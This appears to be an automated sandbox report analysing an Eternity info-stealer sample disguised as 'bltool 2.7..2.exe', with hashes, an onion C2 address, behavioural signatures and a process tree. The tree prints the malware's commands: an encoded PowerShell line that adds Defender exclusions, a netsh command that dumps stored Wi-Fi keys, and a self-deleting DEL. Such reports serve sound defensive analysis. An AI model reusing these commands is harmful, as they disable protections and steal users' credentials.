Overview

overview

10

Static

static

3

bltool 2.7..2.exe

windows7-x64

10

bltool 2.7..2.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    131s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-01-2024 22:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bltool 2.7..2.exe

  • Size

    3.8MB

  • MD5

    e1c3bad47838c6ee4d8696854a5a09a0

  • SHA1

    06a48674f78b840cba9f8e8742b96a274c996f14

  • SHA256

    acc7b7e5b7a0c5e146cf6bc2a21be958d89978798afc479e76df6cf39857547a

  • SHA512

    5c266897401510bbdaa1b83af4372df226c9ee416adcf1a61cd67e4f6970e53c9f9699b02296037305dbac261625dec164cdc70abc7b59a0b048b2fea16e080f

  • SSDEEP

    98304:xl8QhfSIkbonul+rlFgjV+62uoNsrksZ5f:jdfgv+ChZesoa

Score
10/10
eternitycollectionspywarestealer

Malware Config

Extracted

Family

eternity

C2

http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion

Signatures

  • Eternity

    Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.

    eternity
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bltool 2.7..2.exe
    "C:\Users\Admin\AppData\Local\Temp\bltool 2.7..2.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:184
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AagBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAcQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAZgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBhACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2456
    • C:\Users\Admin\AppData\Local\Temp\babu.exe
      "C:\Users\Admin\AppData\Local\Temp\babu.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Accesses Microsoft Outlook profiles
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • outlook_office_path
      • outlook_win_path
      PID:4524
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5104
        • C:\Windows\system32\chcp.com
          chcp 65001
          4⤵
            PID:972
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
              PID:4328
            • C:\Windows\system32\findstr.exe
              findstr All
              4⤵
                PID:2024
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /C chcp 65001 && netsh wlan show profile name="65001" key=clear | findstr Key
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2196
              • C:\Windows\system32\findstr.exe
                findstr Key
                4⤵
                  PID:4152
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profile name="65001" key=clear
                  4⤵
                    PID:3180
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    4⤵
                      PID:1644
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\babu.exe"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2064
                • C:\Users\Admin\AppData\Local\Temp\z.exe
                  "C:\Users\Admin\AppData\Local\Temp\z.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:268
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 268 -s 1068
                    3⤵
                    • Program crash
                    PID:1272
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 268 -ip 268
                1⤵
                  PID:2360
                • C:\Windows\system32\PING.EXE
                  ping 127.0.0.1
                  1⤵
                  • Runs ping.exe
                  PID:3256
                • C:\Windows\system32\chcp.com
                  chcp 65001
                  1⤵
                    PID:100

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mwlbvu35.05b.ps1
                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\babu.exe
                    Filesize

                    336KB

                    MD5

                    992ebc4c599ca9b6f7e6b1a843609e7d

                    SHA1

                    58afffc9df3f3c3b5911bcd77ac843d046ef8dbb

                    SHA256

                    73d5c4d972107c9bf50f0366a4e8466a3fec84009ccc080e51febe5393708ed4

                    SHA512

                    768eda1dc9f692564f51a59c479daf048854560b320143e910da77180cdcc2c0bd957f17411041a86abf08f08d2a00ea8cfd37c393edbd812cb2c1dde18fbb8c

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\z.exe
                    Filesize

                    1.4MB

                    MD5

                    e7ab18c47451b59d2c7c646a29d617c9

                    SHA1

                    c67dee04fc371026a5988f50a17be08a5bd852be

                    SHA256

                    ba72ffde47493f840c5f15ae6ffabff7dacd4405abfb8ee21cf909b67d0f03a7

                    SHA512

                    18c1683fae240b1f4dab15b9a8ca7ed7d5f5d8f6e6b8519ed5b89536c46ebeff94d227b334752e2644398af72f503b50a17ffe0484facbead7d17367b891d834

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\z.exe
                    Filesize

                    1.8MB

                    MD5

                    13cd7343c1149e2a4c01827ae60fdd8e

                    SHA1

                    7eef272c97897fee760e4c209f8914f314555613

                    SHA256

                    fb877ea9a45e04906293802d2b6ba329ab7823484e66a52e756970f8079d4b52

                    SHA512

                    2decca372f60695c89594fe046e3e14c817ed400747ac9bc523163a95f3ed5be2813e0208bcf7bb7ae9a18610840336439d8350199ff62f21b974fa05d01b1f9

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\z.exe
                    Filesize

                    1.7MB

                    MD5

                    517749649e765da517ca6e3a66e03e17

                    SHA1

                    e0c7d98acd01e2b102a61bf3999bbaea9ea7638a

                    SHA256

                    2ede833f7c1ab374318168ab75ae53a87f96fa760672aa835adb9913b82b3302

                    SHA512

                    8fc6c8d482be52cd7e4856017a68d653b26755e453d11d8a8005c1a6375aabd948aaa25ed050a0125f1d627d91d4e74efe35a96bd05f5990bcfc8e89a8136aea

                    Download Submit

                  • memory/268-27-0x0000000073DC0000-0x0000000074570000-memory.dmp

                    Filesize

                    7.7MB

                    Download

                  • memory/268-49-0x0000000073DC0000-0x0000000074570000-memory.dmp

                    Filesize

                    7.7MB

                    Download

                  • memory/268-25-0x0000000000320000-0x000000000068A000-memory.dmp

                    Filesize

                    3.4MB

                    Download

                  • memory/268-44-0x00000000029A0000-0x00000000029B0000-memory.dmp

                    Filesize

                    64KB

                    Download

                  • memory/2456-46-0x00000000064C0000-0x00000000064DE000-memory.dmp

                    Filesize

                    120KB

                    Download

                  • memory/2456-52-0x000000006DC20000-0x000000006DC6C000-memory.dmp

                    Filesize

                    304KB

                    Download

                  • memory/2456-35-0x0000000005E00000-0x0000000005E66000-memory.dmp

                    Filesize

                    408KB

                    Download

                  • memory/2456-36-0x0000000005E70000-0x0000000005ED6000-memory.dmp

                    Filesize

                    408KB

                    Download

                  • memory/2456-76-0x0000000073DC0000-0x0000000074570000-memory.dmp

                    Filesize

                    7.7MB

                    Download

                  • memory/2456-43-0x00000000050F0000-0x0000000005100000-memory.dmp

                    Filesize

                    64KB

                    Download

                  • memory/2456-26-0x0000000005730000-0x0000000005D58000-memory.dmp

                    Filesize

                    6.2MB

                    Download

                  • memory/2456-41-0x00000000050F0000-0x0000000005100000-memory.dmp

                    Filesize

                    64KB

                    Download

                  • memory/2456-24-0x0000000004F20000-0x0000000004F56000-memory.dmp

                    Filesize

                    216KB

                    Download

                  • memory/2456-29-0x0000000073DC0000-0x0000000074570000-memory.dmp

                    Filesize

                    7.7MB

                    Download

                  • memory/2456-45-0x0000000005FE0000-0x0000000006334000-memory.dmp

                    Filesize

                    3.3MB

                    Download

                  • memory/2456-70-0x0000000007A30000-0x0000000007A3E000-memory.dmp

                    Filesize

                    56KB

                    Download

                  • memory/2456-47-0x0000000006AA0000-0x0000000006AEC000-memory.dmp

                    Filesize

                    304KB

                    Download

                  • memory/2456-73-0x0000000007A70000-0x0000000007A78000-memory.dmp

                    Filesize

                    32KB

                    Download

                  • memory/2456-72-0x0000000007B20000-0x0000000007B3A000-memory.dmp

                    Filesize

                    104KB

                    Download

                  • memory/2456-28-0x0000000005620000-0x0000000005642000-memory.dmp

                    Filesize

                    136KB

                    Download

                  • memory/2456-51-0x0000000006A30000-0x0000000006A62000-memory.dmp

                    Filesize

                    200KB

                    Download

                  • memory/2456-63-0x00000000050F0000-0x0000000005100000-memory.dmp

                    Filesize

                    64KB

                    Download

                  • memory/2456-62-0x0000000006A10000-0x0000000006A2E000-memory.dmp

                    Filesize

                    120KB

                    Download

                  • memory/2456-64-0x00000000076C0000-0x0000000007763000-memory.dmp

                    Filesize

                    652KB

                    Download

                  • memory/2456-66-0x00000000077F0000-0x000000000780A000-memory.dmp

                    Filesize

                    104KB

                    Download

                  • memory/2456-65-0x0000000007E30000-0x00000000084AA000-memory.dmp

                    Filesize

                    6.5MB

                    Download

                  • memory/2456-67-0x0000000007860000-0x000000000786A000-memory.dmp

                    Filesize

                    40KB

                    Download

                  • memory/2456-50-0x000000007F3D0000-0x000000007F3E0000-memory.dmp

                    Filesize

                    64KB

                    Download

                  • memory/2456-68-0x0000000007A80000-0x0000000007B16000-memory.dmp

                    Filesize

                    600KB

                    Download

                  • memory/2456-69-0x00000000079F0000-0x0000000007A01000-memory.dmp

                    Filesize

                    68KB

                    Download

                  • memory/2456-71-0x0000000007A40000-0x0000000007A54000-memory.dmp

                    Filesize

                    80KB

                    Download

                  • memory/4524-12-0x0000016D1B4A0000-0x0000016D1B4FA000-memory.dmp

                    Filesize

                    360KB

                    Download

                  • memory/4524-48-0x0000016D35AA0000-0x0000016D35AF0000-memory.dmp

                    Filesize

                    320KB

                    Download

                  • memory/4524-23-0x00007FFBCE1C0000-0x00007FFBCEC81000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/4524-42-0x0000016D35AF0000-0x0000016D35B00000-memory.dmp

                    Filesize

                    64KB

                    Download

                  • memory/4524-78-0x00007FFBCE1C0000-0x00007FFBCEC81000-memory.dmp

                    Filesize

                    10.8MB

                    Download